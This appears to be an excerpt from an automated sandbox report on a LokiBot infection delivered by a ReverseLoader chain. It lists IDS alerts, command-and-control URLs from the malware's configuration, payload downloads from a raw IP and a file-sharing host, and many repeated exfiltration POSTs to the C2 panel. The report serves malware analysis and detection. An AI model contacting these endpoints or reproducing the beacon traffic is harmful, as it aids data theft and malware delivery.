Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50025
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.243.136:80 -> 192.168.2.5:49748
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.5:49705

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: 94.156.177.95/simple/five/fre.php

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /32/SMPLLS.txt HTTP/1.1Host: 192.3.243.136Connection: Keep-Alive

Source: Joe Sandbox View

IP Address: 142.215.209.78 142.215.209.78

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: NET1-ASBG NET1-ASBG

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /32/seemybestthingswithentirelifetimethingstodomybest.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.243.136Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_03034BB0 URLDownloadToFileW,

1_2_03034BB0

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /32/seemybestthingswithentirelifetimethingstodomybest.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.243.136Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /32/SMPLLS.txt HTTP/1.1Host: 192.3.243.136Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: 1017.filemail.com

Source: unknown

HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 180Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
